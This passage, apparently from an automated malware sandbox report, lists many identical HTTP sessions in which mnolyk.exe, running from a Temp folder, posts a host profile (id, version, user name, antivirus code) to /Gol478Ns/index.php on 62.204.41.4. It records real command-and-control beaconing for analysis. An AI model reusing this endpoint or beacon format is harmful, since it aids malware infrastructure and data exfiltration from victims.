                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.761579037 CET | 224 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      11 | 192.168.2.7 | 49705 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:04.226732969 CET | 115 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.288414955 CET | 115 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      110 | 192.168.2.7 | 49805 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:29.940053940 CET | 225 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.004774094 CET | 225 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      111 | 192.168.2.7 | 49806 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:30.176071882 CET | 226 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.238473892 CET | 226 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      112 | 192.168.2.7 | 49807 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:30.407497883 CET | 227 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.470520973 CET | 227 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      113 | 192.168.2.7 | 49808 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:30.643129110 CET | 228 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.705678940 CET | 228 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      114 | 192.168.2.7 | 49809 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:30.882145882 CET | 229 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.945619106 CET | 229 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      115 | 192.168.2.7 | 49810 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:31.110999107 CET | 230 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.173835993 CET | 230 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      116 | 192.168.2.7 | 49811 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:31.352080107 CET | 231 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.417216063 CET | 231 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      117 | 192.168.2.7 | 49812 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:31.595525980 CET | 232 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.659557104 CET | 232 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      118 | 192.168.2.7 | 49813 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:31.831965923 CET | 233 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.895565987 CET | 233 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      119 | 192.168.2.7 | 49814 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:32.080926895 CET | 234 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.144121885 CET | 234 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      12 | 192.168.2.7 | 49706 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:04.472245932 CET | 116 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.536338091 CET | 116 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      120 | 192.168.2.7 | 49815 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:32.330391884 CET | 235 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.396243095 CET | 235 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      121 | 192.168.2.7 | 49816 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:32.564007044 CET | 236 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.628300905 CET | 236 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      122 | 192.168.2.7 | 49817 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:32.798707962 CET | 237 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.860562086 CET | 237 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      123 | 192.168.2.7 | 49818 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:33.042481899 CET | 238 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.109855890 CET | 238 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      124 | 192.168.2.7 | 49819 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:33.315464973 CET | 239 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.379378080 CET | 239 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      125 | 192.168.2.7 | 49820 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:33.547734976 CET | 240 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.610548973 CET | 240 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
